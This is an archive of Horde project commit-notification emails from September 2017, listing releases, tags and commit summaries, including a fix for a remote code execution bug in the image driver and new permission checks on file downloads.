Date:   Tue Sep 19 18:15:09 2017 +0200

    Released Horde_Image-2.5.2

 framework/Image/composer.json | 4 ++--
 framework/Image/package.xml   | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/8d72d7d9624d67b735be295c2a687744049abe52

-----------------------------------------------------------------------

commit c905b2309528f2fe824f8e7fc739d941dfd6cea8
Author: Jan Schneider 
Date:   Tue Sep 19 18:15:09 2017 +0200

    Development mode for Horde_Image-2.5.3

 framework/Image/package.xml | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c905b2309528f2fe824f8e7fc739d941dfd6cea8



From jan at horde.org  Tue Sep 19 16:19:22 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 18:19:22 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_image-2.5.2 created.
	c0a64161e151edeccaa79a2abc808c723cb86fca
Message-ID: <20170919161923.0D7C4100A27@spencer.horde.org>

The annotated tag "horde_image-2.5.2" has been created.
        at  c0a64161e151edeccaa79a2abc808c723cb86fca (tag)
   tagging  8d72d7d9624d67b735be295c2a687744049abe52 (commit)
  replaces  horde_tree-2.0.5
 tagged by  Jan Schneider
        on  Tue Sep 19 18:15:09 2017 +0200

-----------------------------------------------------------------------
Released Horde_Image-2.5.2.

Jan Schneider (3):
      Development mode for Horde_Tree-2.0.6
      [jan] SECURITY: Fix remote code execution vulnerability in Im driver (Thomas Jarosch .
      Released Horde_Image-2.5.2

Thomas Jarosch (1):
      Fix RCE in _raw() via $index parameter.



From jan at horde.org  Tue Sep 19 16:20:01 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 18:20:01 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	31cf0d350b4ef63f49ab5eab64120af6299b7a17
Message-ID: <20170919162001.A259D100A27@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: b05f741510cb4cbeb496c4e95ddeab07f9deeb0c

31cf0d3 New releases.

Summary: http://github.com/horde/horde-web/compare/b05f741510cb4cbeb496c4e95ddeab07f9deeb0c...31cf0d350b4ef63f49ab5eab64120af6299b7a17

-----------------------------------------------------------------------

commit 31cf0d350b4ef63f49ab5eab64120af6299b7a17
Author: Jan Schneider 
Date:   Tue Sep 19 18:19:43 2017 +0200

    New releases.

 config/versions.sqlite | Bin 11264 -> 11264 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

http://github.com/horde/horde-web/commit/31cf0d350b4ef63f49ab5eab64120af6299b7a17



From jan at horde.org  Tue Sep 19 23:14:58 2017
From: jan at horde.org (Jan Schneider)
Date: Wed, 20 Sep 2017 01:14:58 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	4c5c1c413fb617851f2f22c27121cdd510326d13
Message-ID: <20170919231459.32E5C100AAE@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 31cf0d350b4ef63f49ab5eab64120af6299b7a17

4c5c1c4 Crontab: update documentation files.

Summary: http://github.com/horde/horde-web/compare/31cf0d350b4ef63f49ab5eab64120af6299b7a17...4c5c1c413fb617851f2f22c27121cdd510326d13

-----------------------------------------------------------------------

commit 4c5c1c413fb617851f2f22c27121cdd510326d13
Author: Jan Schneider 
Date:   Wed Sep 20 01:14:54 2017 +0200

    Crontab: update documentation files.

 app/views/App/apps/ansel/docs/CHANGES.html     |  8 +++++++-
 app/views/App/apps/horde/docs/CHANGES.html     |  8 +++++++-
 app/views/App/apps/imp/docs/CHANGES.html       |  8 +++++++-
 app/views/App/apps/ingo/docs/CHANGES.html      |  8 +++++++-
 app/views/App/apps/kronolith/docs/CHANGES.html |  8 +++++++-
 app/views/App/apps/mnemo/docs/CHANGES.html     |  8 +++++++-
 app/views/App/apps/nag/docs/CHANGES.html       |  1 +
 app/views/App/apps/trean/docs/CHANGES.html     | 12 +++++++++---
 app/views/App/apps/turba/docs/CHANGES.html     |  8 +++++++-
 app/views/App/apps/whups/docs/CHANGES.html     |  8 +++++++-
 10 files changed, 66 insertions(+), 11 deletions(-)

http://github.com/horde/horde-web/commit/4c5c1c413fb617851f2f22c27121cdd510326d13



From jan at horde.org  Thu Sep 21 11:08:48 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 13:08:48 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	58e7f6cae46a019feaec2546f8f0b772070e2b3a
Message-ID: <20170921110848.D72E410086D@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 95508c3f6b382be1b56fb6312b9db55ffde3f244

dbf9c21 Compared requested tasklists with allowed tasklists.
3ab01b8 Check page permissions when downloading attachments.
2763cd9 Check permissions when downloading files.
58e7f6c BFN

Summary: http://github.com/horde/horde/compare/95508c3f6b382be1b56fb6312b9db55ffde3f244...58e7f6cae46a019feaec2546f8f0b772070e2b3a

-----------------------------------------------------------------------

commit dbf9c214ee5043921c36d44e32c0c3508b32293b
Author: Jan Schneider 
Date:   Mon Sep 18 16:22:18 2017 +0200

    Compared requested tasklists with allowed tasklists.

 nag/lib/Application.php | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/dbf9c214ee5043921c36d44e32c0c3508b32293b

-----------------------------------------------------------------------

commit 3ab01b89ec66292fa454f45edfd5dec6a51e5cc7
Author: Jan Schneider 
Date:   Mon Sep 18 17:23:53 2017 +0200

    Check page permissions when downloading attachments.

 wicked/lib/Application.php | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/3ab01b89ec66292fa454f45edfd5dec6a51e5cc7

-----------------------------------------------------------------------

commit 2763cd9c6715b36ad139c175792ce965d85f98f8
Author: Jan Schneider 
Date:   Mon Sep 18 17:56:48 2017 +0200

    Check permissions when downloading files.

 gollem/lib/Application.php | 15 ++++++++++++---
 1 file changed, 12 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/2763cd9c6715b36ad139c175792ce965d85f98f8

-----------------------------------------------------------------------

commit 58e7f6cae46a019feaec2546f8f0b772070e2b3a
Author: Jan Schneider 
Date:   Mon Sep 18 18:21:56 2017 +0200

    BFN

 gollem/docs/CHANGES       |  3 +++
 gollem/docs/RELEASE_NOTES | 13 +++++++++----
 gollem/package.xml        |  2 ++
 nag/docs/CHANGES          |  1 +
 nag/docs/RELEASE_NOTES    | 11 +++++------
 nag/package.xml           |  2 ++
 wicked/docs/CHANGES       |  1 +
 wicked/docs/RELEASE_NOTES | 17 +++++++++--------
 wicked/package.xml        | 16 ++++++++--------
 9 files changed, 40 insertions(+), 26 deletions(-)

http://github.com/horde/horde/commit/58e7f6cae46a019feaec2546f8f0b772070e2b3a



From jan at horde.org  Thu Sep 21 11:17:50 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 13:17:50 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	a0a0825b18e75407e3dc032f87a1773f8dcee3a0
Message-ID: <20170921111754.8F03D10086D@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 58e7f6cae46a019feaec2546f8f0b772070e2b3a

a0a0825 [jan] Check for both the memcache and memcached extensions in test script (Bug #14691).

Summary: http://github.com/horde/horde/compare/58e7f6cae46a019feaec2546f8f0b772070e2b3a...a0a0825b18e75407e3dc032f87a1773f8dcee3a0

-----------------------------------------------------------------------

commit a0a0825b18e75407e3dc032f87a1773f8dcee3a0
Author: Jan Schneider 
Date:   Thu Sep 21 13:17:37 2017 +0200

    [jan] Check for both the memcache and memcached extensions in test script (Bug #14691).

 horde/docs/CHANGES |  2 ++
 horde/lib/Test.php | 13 +++++++++++--
 horde/package.xml  |  4 ++--
 3 files changed, 15 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/a0a0825b18e75407e3dc032f87a1773f8dcee3a0



From jan at horde.org  Thu Sep 21 12:12:53 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 14:12:53 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	53c995dae171b5e0ee27a24482e7b50886553729
Message-ID: <20170921121256.609A8100CB0@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: c905b2309528f2fe824f8e7fc739d941dfd6cea8

a9e207d Fix regression when exporting single tags to iCalendar CATEGORIES.
f3c28d8 Compared requested tasklists with allowed tasklists.
58197ca Check page permissions when downloading attachments.
d504f67 Check permissions when downloading files.
ede589f BFN
53c995d [jan] Check for both the memcache and memcached extensions in test script (Bug #14691).

Summary: http://github.com/horde/horde/compare/c905b2309528f2fe824f8e7fc739d941dfd6cea8...53c995dae171b5e0ee27a24482e7b50886553729

-----------------------------------------------------------------------

commit a9e207d44d42ae2fc3c96053fe98e8ae57c6f939
Author: Jan Schneider 
Date:   Tue Sep 19 17:00:59 2017 +0200

    Fix regression when exporting single tags to iCalendar CATEGORIES.

 kronolith/lib/Event.php | 6 +++++-
 nag/lib/Task.php        | 6 +++++-
 nag/package.xml         | 1 +
 3 files changed, 11 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/a9e207d44d42ae2fc3c96053fe98e8ae57c6f939

-----------------------------------------------------------------------

commit f3c28d8e95f73b1ac66612399951c3ef37e92ce6
Author: Jan Schneider 
Date:   Mon Sep 18 16:22:18 2017 +0200

    Compared requested tasklists with allowed tasklists.

 nag/lib/Application.php | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/f3c28d8e95f73b1ac66612399951c3ef37e92ce6

-----------------------------------------------------------------------

commit 58197cae24a0eeac22520269dcd35c10055ee2c4
Author: Jan Schneider 
Date:   Mon Sep 18 17:23:53 2017 +0200

    Check page permissions when downloading attachments.

 wicked/lib/Application.php | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/58197cae24a0eeac22520269dcd35c10055ee2c4

-----------------------------------------------------------------------

commit d504f671bee8eaf7af1e9ea953aa6a9c3e942230
Author: Jan Schneider 
Date:   Mon Sep 18 17:56:48 2017 +0200

    Check permissions when downloading files.

 gollem/lib/Application.php | 15 ++++++++++++---
 1 file changed, 12 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/d504f671bee8eaf7af1e9ea953aa6a9c3e942230

-----------------------------------------------------------------------

commit ede589fcdea0996c449e33be5c9c87473257bd62
Author: Jan Schneider 
Date:   Mon Sep 18 18:21:56 2017 +0200

    BFN

 gollem/package.xml  |  1 +
 nag/package.xml     |  1 +
 wicked/docs/CHANGES |  9 +++++++++
 wicked/package.xml  | 19 ++++++++++++++++---
 4 files changed, 27 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/ede589fcdea0996c449e33be5c9c87473257bd62

-----------------------------------------------------------------------

commit 53c995dae171b5e0ee27a24482e7b50886553729
Author: Jan Schneider 
Date:   Thu Sep 21 13:17:37 2017 +0200

    [jan] Check for both the memcache and memcached extensions in test script (Bug #14691).

 horde/docs/CHANGES |  8 ++++++++
 horde/lib/Test.php | 13 +++++++++++--
 horde/package.xml  | 15 ++++++++++++++-
 3 files changed, 33 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/53c995dae171b5e0ee27a24482e7b50886553729



From jan at horde.org  Thu Sep 21 12:19:00 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 14:19:00 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	ab10fa8e3378ab4431f55fffdf2a8ad5481d3963
Message-ID: <20170921121901.8AE0010086D@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: a0a0825b18e75407e3dc032f87a1773f8dcee3a0

2a198ce Released passwd-5.0.7
60d7c97 Development mode for passwd-5.0.8
4e8642d Released gollem-3.0.12
84ab93a Development mode for gollem-3.0.13
9673279 Released wicked-2.0.8
877b89f Development mode for wicked-2.0.9
cb34dc1 Released nag-4.2.17
ab10fa8 Development mode for nag-4.2.18

Summary: http://github.com/horde/horde/compare/a0a0825b18e75407e3dc032f87a1773f8dcee3a0...ab10fa8e3378ab4431f55fffdf2a8ad5481d3963

-----------------------------------------------------------------------

commit 2a198ced2ac03c1cc813581026776b16b89bdf16
Author: Jan Schneider 
Date:   Thu Sep 21 14:15:57 2017 +0200

    Released passwd-5.0.7

 passwd/composer.json       | 37 +++++++++++++++++++++++--------------
 passwd/docs/CHANGES        |  6 +++---
 passwd/lib/Application.php |  2 +-
 passwd/package.xml         |  4 ++--
 4 files changed, 29 insertions(+), 20 deletions(-)

http://github.com/horde/horde/commit/2a198ced2ac03c1cc813581026776b16b89bdf16

-----------------------------------------------------------------------

commit 60d7c97473f22c3995dc414a3a0b53738707f113
Author: Jan Schneider 
Date:   Thu Sep 21 14:15:59 2017 +0200

    Development mode for passwd-5.0.8

 passwd/docs/CHANGES        |  6 ++++++
 passwd/lib/Application.php |  2 +-
 passwd/package.xml         | 18 +++++++++++++++---
 3 files changed, 22 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/60d7c97473f22c3995dc414a3a0b53738707f113

-----------------------------------------------------------------------

commit 4e8642d754cac676ac3b6949cd2d94ce751d82ad
Author: Jan Schneider 
Date:   Thu Sep 21 14:16:52 2017 +0200

    Released gollem-3.0.12

 gollem/composer.json       | 6 +++---
 gollem/docs/CHANGES        | 6 +++---
 gollem/lib/Application.php | 2 +-
 gollem/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/4e8642d754cac676ac3b6949cd2d94ce751d82ad

-----------------------------------------------------------------------

commit 84ab93a4bb1579bb0c95ae75b396ee77a4444952
Author: Jan Schneider 
Date:   Thu Sep 21 14:16:54 2017 +0200

    Development mode for gollem-3.0.13

 gollem/docs/CHANGES        |  6 ++++++
 gollem/lib/Application.php |  2 +-
 gollem/package.xml         | 18 +++++++++++++++---
 3 files changed, 22 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/84ab93a4bb1579bb0c95ae75b396ee77a4444952

-----------------------------------------------------------------------

commit 9673279bdef2ccc6d26ade01b6e922bb8a0f8b47
Author: Jan Schneider 
Date:   Thu Sep 21 14:17:51 2017 +0200

    Released wicked-2.0.8

 wicked/composer.json       | 44 ++++++++++++++++++++++----------------------
 wicked/docs/CHANGES        |  6 +++---
 wicked/lib/Application.php |  2 +-
 wicked/package.xml         |  4 ++--
 4 files changed, 28 insertions(+), 28 deletions(-)

http://github.com/horde/horde/commit/9673279bdef2ccc6d26ade01b6e922bb8a0f8b47

-----------------------------------------------------------------------

commit 877b89f67bc47044702e919f67416d7f55fa8e38
Author: Jan Schneider 
Date:   Thu Sep 21 14:17:53 2017 +0200

    Development mode for wicked-2.0.9

 wicked/docs/CHANGES        |  6 ++++++
 wicked/lib/Application.php |  2 +-
 wicked/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/877b89f67bc47044702e919f67416d7f55fa8e38

-----------------------------------------------------------------------

commit cb34dc12e370a263ecbc708e5ad6797fa0066c07
Author: Jan Schneider 
Date:   Thu Sep 21 14:18:39 2017 +0200

    Released nag-4.2.17

 nag/composer.json       | 6 +++---
 nag/docs/CHANGES        | 6 +++---
 nag/lib/Application.php | 2 +-
 nag/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/cb34dc12e370a263ecbc708e5ad6797fa0066c07

-----------------------------------------------------------------------

commit ab10fa8e3378ab4431f55fffdf2a8ad5481d3963
Author: Jan Schneider 
Date:   Thu Sep 21 14:18:41 2017 +0200

    Development mode for nag-4.2.18

 nag/docs/CHANGES        |  6 ++++++
 nag/lib/Application.php |  2 +-
 nag/package.xml         | 19 +++++++++++++++----
 3 files changed, 22 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/ab10fa8e3378ab4431f55fffdf2a8ad5481d3963



From jan at horde.org  Thu Sep 21 12:19:32 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 14:19:32 +0200 (CEST)
Subject: [commits] Horde annotated tag gollem-3.0.12 created.
	80f1b57e3e3b019e34b304feaabb4f8db6d65fb1
Message-ID: <20170921121932.EC8C610086D@spencer.horde.org>

The annotated tag "gollem-3.0.12" has been created.
        at  80f1b57e3e3b019e34b304feaabb4f8db6d65fb1 (tag)
   tagging  4e8642d754cac676ac3b6949cd2d94ce751d82ad (commit)
  replaces  passwd-5.0.7
 tagged by  Jan Schneider
        on  Thu Sep 21 14:16:52 2017 +0200

-----------------------------------------------------------------------
Released gollem-3.0.12.

Jan Schneider (2):
      Development mode for passwd-5.0.8
      Released gollem-3.0.12



From jan at horde.org  Thu Sep 21 12:19:36 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 14:19:36 +0200 (CEST)
Subject: [commits] Horde annotated tag nag-4.2.17 created.
	0fdbd4419c28a35a87080d52c938fae727235191
Message-ID: <20170921121936.B5DDC10086D@spencer.horde.org>

The annotated tag "nag-4.2.17" has been created.
        at  0fdbd4419c28a35a87080d52c938fae727235191 (tag)
   tagging  cb34dc12e370a263ecbc708e5ad6797fa0066c07 (commit)
  replaces  wicked-2.0.8
 tagged by  Jan Schneider
        on  Thu Sep 21 14:18:39 2017 +0200

-----------------------------------------------------------------------
Released nag-4.2.17.

Jan Schneider (2):
      Development mode for wicked-2.0.9
      Released nag-4.2.17



From jan at horde.org  Thu Sep 21 12:19:40 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 14:19:40 +0200 (CEST)
Subject: [commits] Horde annotated tag passwd-5.0.7 created.
	c9fada305e140458204f5fae391124c309e2aa7b
Message-ID: <20170921121940.87D9E10086D@spencer.horde.org>

The annotated tag "passwd-5.0.7" has been created.
        at  c9fada305e140458204f5fae391124c309e2aa7b (tag)
   tagging  2a198ced2ac03c1cc813581026776b16b89bdf16 (commit)
  replaces  whups-3.0.12
 tagged by  Jan Schneider
        on  Thu Sep 21 14:15:57 2017 +0200

-----------------------------------------------------------------------
Released passwd-5.0.7.

Jan Schneider (7):
      Development mode for whups-3.0.13
      Compared requested tasklists with allowed tasklists.
      Check page permissions when downloading attachments.
      Check permissions when downloading files.
      BFN
      [jan] Check for both the memcache and memcached extensions in test script (Bug #14691).
      Released passwd-5.0.7



From jan at horde.org  Thu Sep 21 12:19:44 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 14:19:44 +0200 (CEST)
Subject: [commits] Horde annotated tag wicked-2.0.8 created.
	210f422e9fdf53202c2949f537fd342a2276ab11
Message-ID: <20170921121944.4E1E510086D@spencer.horde.org>

The annotated tag "wicked-2.0.8" has been created.
        at  210f422e9fdf53202c2949f537fd342a2276ab11 (tag)
   tagging  9673279bdef2ccc6d26ade01b6e922bb8a0f8b47 (commit)
  replaces  gollem-3.0.12
 tagged by  Jan Schneider
        on  Thu Sep 21 14:17:51 2017 +0200

-----------------------------------------------------------------------
Released wicked-2.0.8.

Jan Schneider (2):
      Development mode for gollem-3.0.13
      Released wicked-2.0.8



From jan at horde.org  Thu Sep 21 13:08:41 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 15:08:41 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	0b7f9f426700fa09a122bf4f060a4d999530726e
Message-ID: <20170921130841.B6B6F10086D@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: ab10fa8e3378ab4431f55fffdf2a8ad5481d3963

0b7f9f4 Prepare releases.

Summary: http://github.com/horde/horde/compare/ab10fa8e3378ab4431f55fffdf2a8ad5481d3963...0b7f9f426700fa09a122bf4f060a4d999530726e

-----------------------------------------------------------------------

commit 0b7f9f426700fa09a122bf4f060a4d999530726e
Author: Jan Schneider 
Date:   Thu Sep 21 15:08:00 2017 +0200

    Prepare releases.

 bundles/groupware/docs/CHANGES       | 83 +++++++++++++++++++++++++-----------
 bundles/groupware/docs/RELEASE_NOTES | 24 ++++++++---
 bundles/groupware/package.xml        | 26 +++++------
 bundles/webmail/docs/CHANGES         | 59 +++++++++++++++++++++++++
 bundles/webmail/docs/RELEASE_NOTES   | 24 ++++++++---
 bundles/webmail/package.xml          | 30 +++++++------
 6 files changed, 186 insertions(+), 60 deletions(-)

http://github.com/horde/horde/commit/0b7f9f426700fa09a122bf4f060a4d999530726e



From jan at horde.org  Thu Sep 21 13:23:30 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 15:23:30 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	8c7b51266bf176b0435d5737f36ae345fcefcb5a
Message-ID: <20170921132330.7EDFD10086D@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 0b7f9f426700fa09a122bf4f060a4d999530726e

2e939b7 Released groupware-5.2.22
4198ac9 Development mode for groupware-5.2.23
da4d701 Released webmail-5.2.22
8c7b512 Development mode for webmail-5.2.23

Summary: http://github.com/horde/horde/compare/0b7f9f426700fa09a122bf4f060a4d999530726e...8c7b51266bf176b0435d5737f36ae345fcefcb5a

-----------------------------------------------------------------------

commit 2e939b792d0a73b24a4a6365790450c9a45e90dc
Author: Jan Schneider 
Date:   Thu Sep 21 15:22:06 2017 +0200

    Released groupware-5.2.22

 bundles/groupware/composer.json  | 22 +++++++++++-----------
 bundles/groupware/docs/CHANGES   |  6 +++---
 bundles/groupware/lib/Bundle.php |  2 +-
 3 files changed, 15 insertions(+), 15 deletions(-)

http://github.com/horde/horde/commit/2e939b792d0a73b24a4a6365790450c9a45e90dc

-----------------------------------------------------------------------

commit 4198ac903065a5c7b793feab21b8d5586a1f2a84
Author: Jan Schneider 
Date:   Thu Sep 21 15:22:08 2017 +0200

    Development mode for groupware-5.2.23

 bundles/groupware/docs/CHANGES   |  6 ++++++
 bundles/groupware/lib/Bundle.php |  2 +-
 bundles/groupware/package.xml    | 18 +++++++++++++++---
 3 files changed, 22 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/4198ac903065a5c7b793feab21b8d5586a1f2a84

-----------------------------------------------------------------------

commit da4d701808c3af4100bd1f2d7f0fd07854267fa9
Author: Jan Schneider 
Date:   Thu Sep 21 15:22:53 2017 +0200

    Released webmail-5.2.22

 bundles/webmail/composer.json  | 26 +++++++++++++-------------
 bundles/webmail/docs/CHANGES   |  6 +++---
 bundles/webmail/lib/Bundle.php |  2 +-
 3 files changed, 17 insertions(+), 17 deletions(-)

http://github.com/horde/horde/commit/da4d701808c3af4100bd1f2d7f0fd07854267fa9

-----------------------------------------------------------------------

commit 8c7b51266bf176b0435d5737f36ae345fcefcb5a
Author: Jan Schneider 
Date:   Thu Sep 21 15:22:55 2017 +0200

    Development mode for webmail-5.2.23

 bundles/webmail/docs/CHANGES   |  6 ++++++
 bundles/webmail/lib/Bundle.php |  2 +-
 bundles/webmail/package.xml    | 18 +++++++++++++++---
 3 files changed, 22 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/8c7b51266bf176b0435d5737f36ae345fcefcb5a



From jan at horde.org  Thu Sep 21 13:23:40 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 15:23:40 +0200 (CEST)
Subject: [commits] Horde annotated tag groupware-5.2.22 created.
	6229c181d388971f44f8ddf40f2be5dc03181bfa
Message-ID: <20170921132341.0BD8410086D@spencer.horde.org>

The annotated tag "groupware-5.2.22" has been created.
        at  6229c181d388971f44f8ddf40f2be5dc03181bfa (tag)
   tagging  2e939b792d0a73b24a4a6365790450c9a45e90dc (commit)
  replaces  nag-4.2.17
 tagged by  Jan Schneider
        on  Thu Sep 21 15:22:06 2017 +0200

-----------------------------------------------------------------------
Released groupware-5.2.22.

Jan Schneider (3):
      Development mode for nag-4.2.18
      Prepare releases.
      Released groupware-5.2.22



From jan at horde.org  Thu Sep 21 13:23:44 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 15:23:44 +0200 (CEST)
Subject: [commits] Horde annotated tag webmail-5.2.22 created.
	c18c97830361f29ac2ee35d4c258f2820dca3aa4
Message-ID: <20170921132344.9CDBB100BF2@spencer.horde.org>

The annotated tag "webmail-5.2.22" has been created.
        at  c18c97830361f29ac2ee35d4c258f2820dca3aa4 (tag)
   tagging  da4d701808c3af4100bd1f2d7f0fd07854267fa9 (commit)
  replaces  groupware-5.2.22
 tagged by  Jan Schneider
        on  Thu Sep 21 15:22:53 2017 +0200

-----------------------------------------------------------------------
Released webmail-5.2.22.

Jan Schneider (2):
      Development mode for groupware-5.2.23
      Released webmail-5.2.22



From jan at horde.org  Thu Sep 21 13:26:33 2017
From: jan at horde.org (Jan Schneider)
Date: Thu, 21 Sep 2017 15:26:33 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	a51e514540ece0476fa47d0ef6ac7d6f300a493e
Message-ID: <20170921132633.7646810086D@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 4c5c1c413fb617851f2f22c27121cdd510326d13

a51e514 New releases.

Summary: http://github.com/horde/horde-web/compare/4c5c1c413fb617851f2f22c27121cdd510326d13...a51e514540ece0476fa47d0ef6ac7d6f300a493e

-----------------------------------------------------------------------

commit a51e514540ece0476fa47d0ef6ac7d6f300a493e
Author: Jan Schneider 
Date:   Thu Sep 21 15:26:05 2017 +0200

    New releases.

 config/versions.sqlite | Bin 11264 -> 11264 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

http://github.com/horde/horde-web/commit/a51e514540ece0476fa47d0ef6ac7d6f300a493e



From jan at horde.org  Thu Sep 21 23:15:40 2017
From: jan at horde.org (Jan Schneider)
Date: Fri, 22 Sep 2017 01:15:40 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	388f2df77bac8565fbb0a7f6a1ea44f8459dd753
Message-ID: <20170921231540.BD739100BF2@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: a51e514540ece0476fa47d0ef6ac7d6f300a493e

388f2df Crontab: update documentation files.

Summary: http://github.com/horde/horde-web/compare/a51e514540ece0476fa47d0ef6ac7d6f300a493e...388f2df77bac8565fbb0a7f6a1ea44f8459dd753

-----------------------------------------------------------------------

commit 388f2df77bac8565fbb0a7f6a1ea44f8459dd753
Author: Jan Schneider 
Date:   Fri Sep 22 01:15:35 2017 +0200

    Crontab: update documentation files.

 app/views/App/apps/gollem/docs/CHANGES.html        | 11 ++-
 app/views/App/apps/gollem/docs/RELEASE_NOTES.html  | 11 ++-
 app/views/App/apps/groupware/docs/CHANGES.html     | 91 ++++++++++++++++------
 .../App/apps/groupware/docs/RELEASE_NOTES.html     | 24 ++++--
 app/views/App/apps/horde/docs/CHANGES.html         |  2 +
 app/views/App/apps/nag/docs/CHANGES.html           |  9 ++-
 app/views/App/apps/nag/docs/RELEASE_NOTES.html     |  9 +--
 app/views/App/apps/passwd/docs/CHANGES.html        |  8 +-
 app/views/App/apps/webmail/docs/CHANGES.html       | 67 +++++++++++++++-
 app/views/App/apps/webmail/docs/RELEASE_NOTES.html | 24 ++++--
 app/views/App/apps/wicked/docs/CHANGES.html        |  9 ++-
 app/views/App/apps/wicked/docs/RELEASE_NOTES.html  | 15 ++--
 12 files changed, 225 insertions(+), 55 deletions(-)

http://github.com/horde/horde-web/commit/388f2df77bac8565fbb0a7f6a1ea44f8459dd753



From wikiguest at horde.org  Fri Sep 22 12:22:55 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Fri, 22 Sep 2017 12:22:55 +0000
Subject: [commits] [Wiki] attachment: Wiki/Usage, Danger.html
Message-ID: <20170922122255.Horde.ci7s2H57X_dDChPgHziHhfB@wiki.horde.org>

guest [23.27.244.47]  Fri, 22 Sep 2017 12:22:55 +0000

New attachment "Danger.html" to page "Wiki/Usage". View page:  
https://wiki.horde.org/Wiki/Usage


From wikiguest at horde.org  Fri Sep 22 12:27:54 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Fri, 22 Sep 2017 12:27:54 +0000
Subject: [commits] [Wiki] attachment: Wiki/Usage, Danger.html
Message-ID: <20170922122754.Horde.LTufFNGRplDTE8mExMuGF9P@wiki.horde.org>

guest [23.27.244.47]  Fri, 22 Sep 2017 12:27:54 +0000

Updated attachment "Danger.html" on page "Wiki/Usage". View page:  
https://wiki.horde.org/Wiki/Usage


From jan at horde.org  Fri Sep 22 15:57:30 2017
From: jan at horde.org (Jan Schneider)
Date: Fri, 22 Sep 2017 17:57:30 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	47261d972e5b984e24e562ba1f58b53d20198120
Message-ID: <20170922155730.7947210051A@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 53c995dae171b5e0ee27a24482e7b50886553729

47261d9 Backup/restore preferences too.

Summary: http://github.com/horde/horde/compare/53c995dae171b5e0ee27a24482e7b50886553729...47261d972e5b984e24e562ba1f58b53d20198120

-----------------------------------------------------------------------

commit 47261d972e5b984e24e562ba1f58b53d20198120
Author: Jan Schneider 
Date:   Fri Sep 22 17:57:19 2017 +0200

    Backup/restore preferences too.

 framework/Core/lib/Horde/Registry/Application.php | 55 +++++++++++++++++++++++
 framework/Core/package.xml                        | 18 ++++----
 framework/Prefs/doc/Horde/Prefs/UPGRADING         |  8 ++++
 framework/Prefs/lib/Horde/Prefs.php               | 15 +++++++
 framework/Prefs/package.xml                       | 16 +++----
 horde/lib/Application.php                         | 26 +++++++++++
 horde/package.xml                                 |  2 +-
 kronolith/lib/Application.php                     |  5 +++
 kronolith/package.xml                             |  2 +-
